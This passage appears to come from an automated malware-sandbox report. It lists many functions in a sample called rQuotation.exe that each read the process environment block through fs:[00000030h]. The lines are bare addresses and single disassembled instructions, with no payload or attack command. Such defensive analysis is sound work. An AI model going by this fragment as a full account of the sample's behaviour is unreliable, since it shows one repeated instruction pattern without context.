              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BC310 mov ecx, dword ptr fs:[00000030h]0_2_016BC310
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E0310 mov ecx, dword ptr fs:[00000030h]0_2_016E0310
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F63FF mov eax, dword ptr fs:[00000030h]0_2_016F63FF
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE3F0 mov eax, dword ptr fs:[00000030h]0_2_016DE3F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE3F0 mov eax, dword ptr fs:[00000030h]0_2_016DE3F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE3F0 mov eax, dword ptr fs:[00000030h]0_2_016DE3F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017643D4 mov eax, dword ptr fs:[00000030h]0_2_017643D4
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017643D4 mov eax, dword ptr fs:[00000030h]0_2_017643D4
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C83C0 mov eax, dword ptr fs:[00000030h]0_2_016C83C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C83C0 mov eax, dword ptr fs:[00000030h]0_2_016C83C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C83C0 mov eax, dword ptr fs:[00000030h]0_2_016C83C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C83C0 mov eax, dword ptr fs:[00000030h]0_2_016C83C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E3DB mov eax, dword ptr fs:[00000030h]0_2_0176E3DB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E3DB mov eax, dword ptr fs:[00000030h]0_2_0176E3DB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E3DB mov ecx, dword ptr fs:[00000030h]0_2_0176E3DB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E3DB mov eax, dword ptr fs:[00000030h]0_2_0176E3DB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017463C0 mov eax, dword ptr fs:[00000030h]0_2_017463C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177C3CD mov eax, dword ptr fs:[00000030h]0_2_0177C3CD
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E438F mov eax, dword ptr fs:[00000030h]0_2_016E438F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E438F mov eax, dword ptr fs:[00000030h]0_2_016E438F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE388 mov eax, dword ptr fs:[00000030h]0_2_016BE388
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE388 mov eax, dword ptr fs:[00000030h]0_2_016BE388
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE388 mov eax, dword ptr fs:[00000030h]0_2_016BE388
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B8397 mov eax, dword ptr fs:[00000030h]0_2_016B8397
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B8397 mov eax, dword ptr fs:[00000030h]0_2_016B8397
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B8397 mov eax, dword ptr fs:[00000030h]0_2_016B8397
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B826B mov eax, dword ptr fs:[00000030h]0_2_016B826B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C4260 mov eax, dword ptr fs:[00000030h]0_2_016C4260
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C4260 mov eax, dword ptr fs:[00000030h]0_2_016C4260
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C4260 mov eax, dword ptr fs:[00000030h]0_2_016C4260
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0179625D mov eax, dword ptr fs:[00000030h]0_2_0179625D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177A250 mov eax, dword ptr fs:[00000030h]0_2_0177A250
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177A250 mov eax, dword ptr fs:[00000030h]0_2_0177A250
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6259 mov eax, dword ptr fs:[00000030h]0_2_016C6259
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01748243 mov eax, dword ptr fs:[00000030h]0_2_01748243
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01748243 mov ecx, dword ptr fs:[00000030h]0_2_01748243
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BA250 mov eax, dword ptr fs:[00000030h]0_2_016BA250
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B823B mov eax, dword ptr fs:[00000030h]0_2_016B823B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D02E1 mov eax, dword ptr fs:[00000030h]0_2_016D02E1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D02E1 mov eax, dword ptr fs:[00000030h]0_2_016D02E1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D02E1 mov eax, dword ptr fs:[00000030h]0_2_016D02E1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA2C3 mov eax, dword ptr fs:[00000030h]0_2_016CA2C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA2C3 mov eax, dword ptr fs:[00000030h]0_2_016CA2C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA2C3 mov eax, dword ptr fs:[00000030h]0_2_016CA2C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA2C3 mov eax, dword ptr fs:[00000030h]0_2_016CA2C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA2C3 mov eax, dword ptr fs:[00000030h]0_2_016CA2C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017962D6 mov eax, dword ptr fs:[00000030h]0_2_017962D6
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D02A0 mov eax, dword ptr fs:[00000030h]0_2_016D02A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D02A0 mov eax, dword ptr fs:[00000030h]0_2_016D02A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov eax, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov ecx, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov eax, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov eax, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov eax, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov eax, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE284 mov eax, dword ptr fs:[00000030h]0_2_016FE284
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE284 mov eax, dword ptr fs:[00000030h]0_2_016FE284
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01740283 mov eax, dword ptr fs:[00000030h]0_2_01740283
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01740283 mov eax, dword ptr fs:[00000030h]0_2_01740283
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01740283 mov eax, dword ptr fs:[00000030h]0_2_01740283
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F656A mov eax, dword ptr fs:[00000030h]0_2_016F656A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F656A mov eax, dword ptr fs:[00000030h]0_2_016F656A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F656A mov eax, dword ptr fs:[00000030h]0_2_016F656A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8550 mov eax, dword ptr fs:[00000030h]0_2_016C8550
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8550 mov eax, dword ptr fs:[00000030h]0_2_016C8550
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE53E mov eax, dword ptr fs:[00000030h]0_2_016EE53E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE53E mov eax, dword ptr fs:[00000030h]0_2_016EE53E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE53E mov eax, dword ptr fs:[00000030h]0_2_016EE53E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE53E mov eax, dword ptr fs:[00000030h]0_2_016EE53E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE53E mov eax, dword ptr fs:[00000030h]0_2_016EE53E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01756500 mov eax, dword ptr fs:[00000030h]0_2_01756500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC5ED mov eax, dword ptr fs:[00000030h]0_2_016FC5ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC5ED mov eax, dword ptr fs:[00000030h]0_2_016FC5ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C25E0 mov eax, dword ptr fs:[00000030h]0_2_016C25E0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE5CF mov eax, dword ptr fs:[00000030h]0_2_016FE5CF
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE5CF mov eax, dword ptr fs:[00000030h]0_2_016FE5CF
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C65D0 mov eax, dword ptr fs:[00000030h]0_2_016C65D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA5D0 mov eax, dword ptr fs:[00000030h]0_2_016FA5D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA5D0 mov eax, dword ptr fs:[00000030h]0_2_016FA5D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017405A7 mov eax, dword ptr fs:[00000030h]0_2_017405A7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017405A7 mov eax, dword ptr fs:[00000030h]0_2_017405A7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017405A7 mov eax, dword ptr fs:[00000030h]0_2_017405A7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E45B1 mov eax, dword ptr fs:[00000030h]0_2_016E45B1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E45B1 mov eax, dword ptr fs:[00000030h]0_2_016E45B1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F4588 mov eax, dword ptr fs:[00000030h]0_2_016F4588
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C2582 mov eax, dword ptr fs:[00000030h]0_2_016C2582
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C2582 mov ecx, dword ptr fs:[00000030h]0_2_016C2582
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE59C mov eax, dword ptr fs:[00000030h]0_2_016FE59C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174C460 mov ecx, dword ptr fs:[00000030h]0_2_0174C460
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EA470 mov eax, dword ptr fs:[00000030h]0_2_016EA470
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EA470 mov eax, dword ptr fs:[00000030h]0_2_016EA470
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EA470 mov eax, dword ptr fs:[00000030h]0_2_016EA470
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177A456 mov eax, dword ptr fs:[00000030h]0_2_0177A456
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E245A mov eax, dword ptr fs:[00000030h]0_2_016E245A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B645D mov eax, dword ptr fs:[00000030h]0_2_016B645D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE420 mov eax, dword ptr fs:[00000030h]0_2_016BE420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE420 mov eax, dword ptr fs:[00000030h]0_2_016BE420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE420 mov eax, dword ptr fs:[00000030h]0_2_016BE420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BC427 mov eax, dword ptr fs:[00000030h]0_2_016BC427
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F8402 mov eax, dword ptr fs:[00000030h]0_2_016F8402
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F8402 mov eax, dword ptr fs:[00000030h]0_2_016F8402
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F8402 mov eax, dword ptr fs:[00000030h]0_2_016F8402
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C04E5 mov ecx, dword ptr fs:[00000030h]0_2_016C04E5
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174A4B0 mov eax, dword ptr fs:[00000030h]0_2_0174A4B0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C64AB mov eax, dword ptr fs:[00000030h]0_2_016C64AB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F44B0 mov ecx, dword ptr fs:[00000030h]0_2_016F44B0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177A49A mov eax, dword ptr fs:[00000030h]0_2_0177A49A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8770 mov eax, dword ptr fs:[00000030h]0_2_016C8770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702750 mov eax, dword ptr fs:[00000030h]0_2_01702750
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702750 mov eax, dword ptr fs:[00000030h]0_2_01702750
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01744755 mov eax, dword ptr fs:[00000030h]0_2_01744755
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F674D mov esi, dword ptr fs:[00000030h]0_2_016F674D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F674D mov eax, dword ptr fs:[00000030h]0_2_016F674D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F674D mov eax, dword ptr fs:[00000030h]0_2_016F674D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174E75D mov eax, dword ptr fs:[00000030h]0_2_0174E75D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C0750 mov eax, dword ptr fs:[00000030h]0_2_016C0750
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173C730 mov eax, dword ptr fs:[00000030h]0_2_0173C730
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC720 mov eax, dword ptr fs:[00000030h]0_2_016FC720
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC720 mov eax, dword ptr fs:[00000030h]0_2_016FC720
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F273C mov eax, dword ptr fs:[00000030h]0_2_016F273C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F273C mov ecx, dword ptr fs:[00000030h]0_2_016F273C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F273C mov eax, dword ptr fs:[00000030h]0_2_016F273C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC700 mov eax, dword ptr fs:[00000030h]0_2_016FC700
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C0710 mov eax, dword ptr fs:[00000030h]0_2_016C0710
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F0710 mov eax, dword ptr fs:[00000030h]0_2_016F0710
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E27ED mov eax, dword ptr fs:[00000030h]0_2_016E27ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E27ED mov eax, dword ptr fs:[00000030h]0_2_016E27ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E27ED mov eax, dword ptr fs:[00000030h]0_2_016E27ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174E7E1 mov eax, dword ptr fs:[00000030h]0_2_0174E7E1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C47FB mov eax, dword ptr fs:[00000030h]0_2_016C47FB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C47FB mov eax, dword ptr fs:[00000030h]0_2_016C47FB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CC7C0 mov eax, dword ptr fs:[00000030h]0_2_016CC7C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017407C3 mov eax, dword ptr fs:[00000030h]0_2_017407C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C07AF mov eax, dword ptr fs:[00000030h]0_2_016C07AF
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017747A0 mov eax, dword ptr fs:[00000030h]0_2_017747A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176678E mov eax, dword ptr fs:[00000030h]0_2_0176678E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA660 mov eax, dword ptr fs:[00000030h]0_2_016FA660
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA660 mov eax, dword ptr fs:[00000030h]0_2_016FA660
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178866E mov eax, dword ptr fs:[00000030h]0_2_0178866E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178866E mov eax, dword ptr fs:[00000030h]0_2_0178866E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F2674 mov eax, dword ptr fs:[00000030h]0_2_016F2674
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DC640 mov eax, dword ptr fs:[00000030h]0_2_016DC640
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C262C mov eax, dword ptr fs:[00000030h]0_2_016C262C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE627 mov eax, dword ptr fs:[00000030h]0_2_016DE627
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F6620 mov eax, dword ptr fs:[00000030h]0_2_016F6620
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F8620 mov eax, dword ptr fs:[00000030h]0_2_016F8620
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D260B mov eax, dword ptr fs:[00000030h]0_2_016D260B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D260B mov eax, dword ptr fs:[00000030h]0_2_016D260B
